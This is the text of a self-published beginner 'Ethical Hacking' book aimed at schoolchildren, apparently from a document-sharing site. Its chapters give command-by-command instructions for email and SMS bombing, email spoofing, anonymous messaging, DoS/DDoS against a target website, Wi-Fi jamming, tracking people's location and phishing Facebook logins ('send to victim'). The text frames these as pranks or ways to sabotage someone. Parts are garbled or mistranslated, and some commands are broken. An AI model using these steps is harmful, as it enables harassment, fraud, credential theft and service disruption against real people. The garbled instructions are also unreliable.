ISBN Interior

You might also like

Download as pdf or txt
Download as pdf or txt
You are on page 1of 23

Ethical Hacking Part-1

Ethical Hacking
Part- 1

Mohammad Abu Jakaria

ZED Prokashoni
Ethical Hacking Part-1
Md. Abu Zakaria
Copyright: Author
1st publication: July 2021

Publisher:
Z Publishing,
Phone: 017560096
Facebook.com/ZEDProkashoni

Printing:
Tasin Computers
Kaliganj, Nageshwari, Kurigram

Distributor and place of receipt:


Google Play Books
Amazon.com
Recuten Kobo
Apple Books
Barnes & Noble
Plaster.com
Tolino.com
Over drive
Scribd.com
Bibliodaka.com
Blue.com
The Smaswords.com
Odilio.com
BookMate.com
Indigo.com
Price: 415 rupees
All rights reserved to this book by the author. Reprinting of this book, copying of any part,
photocopying, taking photographs, storing it electronically / digitally for any purpose without the
written permission of the author or publisher is prohibited.

Ethical Hacking Part 1


By Md. Abu Jakaria
1st Published: July 2021
Ethical Hacking Part-1

Ethical Hacking
Part- 1

Mohammad Abu Jakaria

ZED Prokashoni
Ethical Hacking Part-1

Dedicated to
My Father & Mother
Ethical Hacking Part-1

Index

Introduction
About the author
Author”s introduction
Chapter zero: Before the start
Chapter One: Kali Linux Installation
Chapter Two: Basic Uses of Linux
Chapter Three: E-mail B0mbing
Chapter Four: E-mail Sp00fing
Chapter Five: SMS B0mbing
Chapter Six: An0nymous SMS
Chapter Seven: Information Gathering
Chapter Eight: D0S-DD0S Attack
Chapter nine: Locati0n tracking
Chapter Ten: Wi-Fi Network Jamming
Chapter Eleven: MAC Changing
Chapter Twelve: Phi*shing
Ethical Hacking Part-1

Introduction
Computers were born to compute or calculate. But on the computer people listen to
music, watch movies, write letters, use Facebook, surf the internet, even steal but people
don't think about the security of their cyber life! But the joy of knowing about cyber
security is not in anything else, all you need to know to know about ink Linux (Operating
System) and use it.

Cyber security and ethical hacking are taught in universities or large educational
institutions, but not many people know that even school-college children can easily
acquire knowledge about it. I have been thinking for a long time, writing a book like
this for school children; But I could not get up in time.

Now I sat down to write for a while. Hopefully, by reading this book, you will get basic
and advanced ideas about cyber security and ethical hacking and you can learn a lot
from the internet on your own. I will try my best to explain everything to you part by
part in simple, straightforward and fluent language.

If you have any comments about the book, please let us know at:
E-mail: zedthedanger@yandex.com
Facebook: www.facebook.com/ZEDProkashoni
Twitter: www.twitter.com/ZEDProkashoni
Ethical Hacking Part-1

About Author

Md. Abu Zakaria was born on August 20, 2002 in Kurigram. The village home is in Vita
village of West Fandi in Kaliganj union of Nageshwari upazila of Kurigram district. His
father Md. Abdul Aziz is a farmer and his mother Jahanara Begum is a housewife. He
now lives in the Tejgaon area of Dhaka. He is the author of several popular
technology books in Bengali.

He studied at Pushkarini Par Primary School, Kaliganj Huzur Ali High School, Dhaka
Polytechnic Institute. In 2013, he passed GPA-5 in the final examination of primary
education and passed the fifth class.
He was admitted to Kaliganj Huzur Ali High School in 2014. He passed the Junior
School Certificate examination from that school in 2016 and the Secondary School
Certificate examination in 2019 with GPA-5. Then in the same year he was admitted in
Ethical Hacking Part-1
the Department of Computer Science and Engineering of the best diploma engineering
institute of the country "Dhaka Polytechnic Institute". He is still studying there.
Facebook: www.facebook.com/ABUJAKARIA316
Instagram: www.instagram.com/abujakariacse

Author’s Introduction

I have met many children who mix with different places and environments and they
often ask me which book to read or where to learn about cyber security! The book is
written for them. However, I have seen many people who do not feel comfortable
reading English books, so many fall behind and do not get a chance to overcome that
weakness. I am sure that if they had started with a Bengali book, they could have
learned better.

The book is useful for those who are learning about cyber security for the first time in
their lives. Students in class nine or above should not have any problem reading the
book. The book only gives you a brief overview on ethical hacking and cyber security.
This is not really a book on hacking learning, but an emphasis on the basics of ethical
hacking and cyber security, so as to build a solid foundation for becoming a good quality
ethical hacker or cyber security specialist.

Any suggestions or comments about this book can be emailed to abujakaria316@aol.com.


You can also contact our publisher's page on Facebook at the following address-
www.facebook.com/ZEDProkashoni
Ethical Hacking Part-1

Before chapter: zero begins


This book is a book on learning hacking. But at the beginning we will talk about some
things. It will be of great benefit to us to read the book.

The computer is actually a calculating device, isn't it? Although we watch videos, listen
to music, play games and do other things with it. In fact in the end the computer
understands nothing but its commands. Hacking is mainly done with a programming
language. But we will not learn programming language in this book. We will learn how
to hack without programming, that is, with prepared programming. For this we need to
install Kali Linux (operating system) on our PC and learn how to use commands. Next
we will learn how to install Kali Linux.

The most important thing to learn hacking is attention, time and practice. Without them
you can never learn hacking. Because hacking is not a small thing, you swallow it like
water. To learn hacking, you need a fresh mind, to practice for a long time without
following a single rate. Only then can you become a good and skilled Ethical Hacker /
Cyber Security Specialist.

If after reading the above you think it is not possible by me then you still omit. Because
hacking is not possible if you do anything else. Because you don't have the patience,
confidence and courage. So get rid of the hacking thinking and try to learn something
else and develop skills in that regard. And the one who thinks you can, then start the
next chapter, how?
Ethical Hacking Part-1

Chapter One: Kali Linux Installation


Dear students, welcome to the world of hacking. This time let's learn how to install
Kali Linux (operating system). First download the ISO file named Kali Live Persistance
from this website www.kali.org. Then download the software called Rufus.

We will now install Kali Live Persistence on our PCs so that we do not have to worry
about getting back to Windows PCs. This will require a pen drive. Note that if you are
above 16 GB, it will be convenient for you.

Now open the downloaded Rufus software. Then plug your pen drive into the PC. You
can see the name of your pen drive in the Device option above. Now right click on
Select in Boot Selection and hold the ink file in the folder where you were
downloading. Then go to Persistence Partition Size and do your partition. I mean, if
you have a 16 GB pen drive, make it 6 GB, and if you have 32 GB, make it 16 GB.

Then finally click on Start.

When you have finished booting, restart the PC and press the boot menu. Then make
a boot selection. Then you will see some options in front of you. From there, type Kali
USB Persistance and press Enter.

After a while your PC will turn on and Kali will ask for Linux password. Enter kali in
the password box. That means Username & Password will be kali.
Ethical Hacking Part-1

Chapter Two: Basic Uses of Linux


After turning on your PC, you will see a screen like the one below.

The icon marked with a red arrow on the screen is Application Manager, and the icon
marked with a yellow arrow is Terminal.

In this book we use Terminal the most. The terminal looks exactly like the command
prompt on a Windows PC. Here you just have to work with commands.

And we will use all the files or software used in the terminal from GitHub. GitHub is
the only free platform where you can save and use your code or program at any time.

And the icons marked by the green arrow are the partition manager of your hard
drive.

This is how you can become a pro level ethical hacker if you try it yourself and learn
something from Google and YouTube.
Ethical Hacking Part-1

Chapter Three: E-mail B0mbing


E-mail bombing refers to when excessive mail is sent to someone's email at a single
time. That is, suppose you send an e-mail to one of your friends. You must do this by
collecting his email address. Then if you send the message you need more than once in
a single time with the help of a bot, it will be called email bombing.

Why e-mail is basically done: -


Suppose someone imports a product from outside the country. An important mail will
arrive at his email address at 8:30 tonight. And that mail will mention the time and
place of delivery of its products. Now if you send 10,000 mails to his mail at once, but
he will not be able to see his mail at the right time. And because of which his deal is
no longer complete. It can happen to a person only when he has an enemy. Although
now all mail providers have introduced an option called spam. Which can stop annoying
mails from coming.

So what's the delay? Let's learn e-mail bombing-6


First open your Linux Terminal. Then download the email bombing file from GitHub to
your system. To do this use a command, the command is git clone
https://github.com/Ha3MrX/Emailbomb.git The file is now installed on your system.
Type the command cd Emailbomb to open the file. Then you will see a few files. Now
you have to give access permission to those files. To do this, type the command chmod
+ x Emailbomb.py
Your permission has been granted. Now the job is to run it. Command to run Python
Emailbomb.py
Ethical Hacking Part-1

Chapter Four: Email Sp00fing


E-mail spoofing means sending emails while hiding one's identity behind someone
else's identity. Don't you understand? So let's clear up through an example. Suppose
you want to send an e-mail to your friend but keep your identity anonymous.
Remember, you want to message your friend from the email address of Bangladesh
Bank. But for that you have to be one of the admin panel of Bangladesh Bank.
Because no one other than the admin panel can access that mail. What if you could
only email them using their mail address without their username and password ?!
Let's get started then.
Visit the emkei.cz website first.
Ethical Hacking Part-1

Email spoofing with social E toolkit -


First go to the application option and search for Social Engineering Toolkit. Then after
the whole page is loaded you will see many options, from there enter the number 1
i.e. select the Social Engineering Attack option. Then go to the number 5 Mass Mailer
Attact.
Then go to No. 1 Email Attact Single Email Address. Then in the Send email to option,
enter the email of the person to whom you want to send the message. Then choose
the option Use your own server or open relay.
Then enter From Address, From name respectively
Complete everything as shown in the image below.
Note: You must have a smtp server to spoof email in this manner.
Ethical Hacking Part-1

Chapter Five: SMS B0mbing


SMS bombing is just like email bombing. Let's learn how to do SMS bombing. I will
give commands to some of your files and try them.
First, open your Linux terminal. Then give the command -
Method 1: -
git clone https://github.com/BotolMehedi/BOTP.git - This is taken from GitHub. It's
taken from GitHub.
After giving the command, the file will be downloaded to your system. Now you need
to open the file. So give the command ls then you will see the file in front of you.
Now give the command cd BOTP
Then give the command python2 botp.py
With this command you run the file using Python language.
Then a few options will appear in front of you. Which shows that if you understand a
little English then you will understand what you want.
Method 2: -
git clone https://github.com/darkhunter141/smsfucker-2.0.git - This is taken from
GitHub.
ls
cd smsfucker-2.0
python main

Method 3: -
https://github.com/coderwarzone/sms-spam.git - taken from GitHub
ls
cd sms-spam
ls
chmod + x kurulum.sh
ls
./kurulum.sh
Ethical Hacking Part-1

Chapter Six: Anonymous SMS Sending


We all do SMS. But what if I sent an SMS but no one recognized me? It will be a lot
of fun, won't it ?! Let's learn how to message with anonymity - 6
First open the terminal then give the command git clone
https://github.com/HACK3RY2J/Anon-SMS.git
Now the file has been downloaded to your system. Give the following commands,
respectively
cd Anon-SMS
sudo bash Run.sh
Then entering 1 also means save Run Anon sms option.
Then enter whatever it takes to finish the batch work.
There are several other ways to do this. For example, there are 2 apps for Android.
Go to the Play Store and search for BD GO SMS then download and create an account.
Then open it and see that there is 3 dot option on the left side. Collect coins by
clicking there so that the balance of sending your message becomes.

Another way is to go to the browser and search for softclever free sms sender then go
to their website and create an account and send sms. However, in Softclever apps and
Paba Play Store.

Another method is to go to the browser and search freebulksmsonline.com then select


the country, enter the phone number and verify the Captcha and click the Send
button.
Ethical Hacking Part-1

Chapter Seven: Information Gathering


Information gathering is an important issue in this age. For example, if you want to
find out the email address of a website or see where an email address has been used,
then you need to learn information gathering. If you want to find out all the
information with someone's username, then Information Gathering is for you. So let's
learn how to do information gathering.
First open the terminal then give the command git clone
https://github.com/m4ll0k/Infoga.git
Now the file has been downloaded to your system. Then give the following commands
respectively
cd Infoga
python setup.py install
python infoga.py
Type this command if you want to find out the information of the website
python infoga.py --domain nsa.gov --source all --breach -v 2 --report ../nsa_gov.txt
And if you want to get the information in the email then type this command python
infoga.py --info m4ll0k@protonmail.com --breach -v 3 --report ../m4ll0k.txt

Then give the command


cd
ls
cat domain_name

-----------------------------------------------------------------------------------------------------------
Ethical Hacking Part-1

And if you want to find out the information with the username, then open the
terminal and give the command

git clone https://github.com/sherlock-project/sherlock.git

Now the file is downloaded to your system.

Then type the following commands respectively -

cd sherlock

python3 -m pip install -r requirements.txt

python3 sherlock <username>

ls

nano <username.txt>

You can visit the Whois.com site to find out more about something.
Ethical Hacking Part-1

Chapter Eight: D0S/DD0S Attack


DOS or DIDS attack means sending unlimited traffic to a server and down that server.
To do. Let's learn how to attack DOS or DIDS -

Method 1: -
git clone https://github.com/cyweb/hammer.git
ls
cd hammer
python hammer.py
python hammer.py -s www.targetwebsite.com
Method 2: -
git clone https://github.com/XCHADXFAQ77X/XERXES.git
cd xerxes
ls
gcc xerxes.c -o xerxes
./xerxes tergetwebsite.com 80

Method 3: -
https://github.com/XCHADXFAQ77X/XERXES.git
cd desktop
ls
cd xerxes
gcc xerxes.c -o xerxes
./xerxes <targetwebsite.com> 80
Ethical Hacking Part-1

Chapter Nine: Location Tracking


You want to see where one of your closures is. If you can locate it
How do you feel ?! Of course it will be a lot of fun, right? Let's learn how to IP address
How to find out all the information about someone's location and their internet provider
-
First open the terminal and input the following commands respectively: -
Method 1: -
git clone https://github.com/maldevel/IPGeoLocation.git
ls
cd IPGeoLocation
pip install -r requirements.txt
python ipgeolocation.py
python ipgeolocation.py -m (for my ip check)
python ipgeolocation.py -t www.targetwebsite.com

Method 2: -
Open the terminal and enter the following commands
git clone https://github.com/maldevel/IPGeoLocation.git
ls
cd IPGeoLocation
pip install -r requirements.txt
python ipgeolocation.py
python ipgeolocation.py -m (for my ip check)
python ipgeolocation.py -t www.targetsite.com

In this way, it is possible to identify someone's IP address. But how do you IP it

It is up to you to collect the address.


Ethical Hacking Part-1

Chapter Ten: Network Jamming


Network jamming means slowing down the network. Network jamming in two ways
Is done. One is hardware based the other is software based. So today we will learn
How Software based network jamming can be done. Let's get started

First open the terminal and type the following command


https://github.com/v1s1t0r1sh3r3/airgeddon.git
sudo bash ./airgeddon.sh
3,
2,
4,
4,
10,
5,
y,

Here I have asked you to select the option with numbering. I hope you understand
and from now on I will be able to do software based network jamming.
Ethical Hacking Part-1

Chapter Eleven: MAC Address Change


MAC stands for Media Access Control Address. Every phone King PC has a MAC
address and with this MAC address it is easy to identify or track someone. Let's learn
how to change MAC address in different ways today1.
# sudo -i
# ifconfig wlan0 down
# macchanger -A wlan0

2. # sudo ifconfig wlan0 down


# sudo service network-manager stop
# sudo macchanger -a wlan0 –OR-
# sudo macchanger -r wlan0 –OR-
# sudo macchanger --mac xx:xx:xx:xx:xx:xx wlan0

3. # service network-manager stop; sleep 5


# ifconfig wlan0 down
# macchanger -b -a wlan0; sleep 5
# ifconfig wlan0 up; sleep 5
# service network-manager start

4. # service network-manager stop; sleep 5


# ifconfig wlan0 down; ifconfig wlan0 hw ether F8:27:93:01:02:03
# ifconfig wlan0 up; sleep 5;
# service network-manager start; sleep 5;

5. # service NetworkManager stop


# ifconfig wlan0 down
# macchanger -r wlan0
# ifconfig wlan0 up
# service NetworkManager start
Ethical Hacking Part-1

Chapter Twelve: Phising


The word phishing means fad. This means that when the user is fooled and thrown
into the trap, it is called phishing. Different types of hacking can be done with
phishing. Although it was used a lot in 2000-2012, its use has decreased a lot now that
the user is more aware. Let's learn how to fish in multiple ways.
First open the terminal and follow the following commands -
Method 1: -
git clone https://github.com/evait-security/weeman.git
ls
cd weeman
ls
python2 weeman.py
set url http://facebook.com
set url https://facebook.com
set action_url http://facebook.com
run
copy the link & send to victim

Method 2: -
git clone https://github.com/An0nUD4Y/blackeye.git
cd blackeye
bash blackeye.sh

Method 3: -
git clone
https://github.com/8L4NK/blackeye.git/https://github.com/thelinuxchoice/blackeye
cd blackeye
bash blackeye.sh

You might also like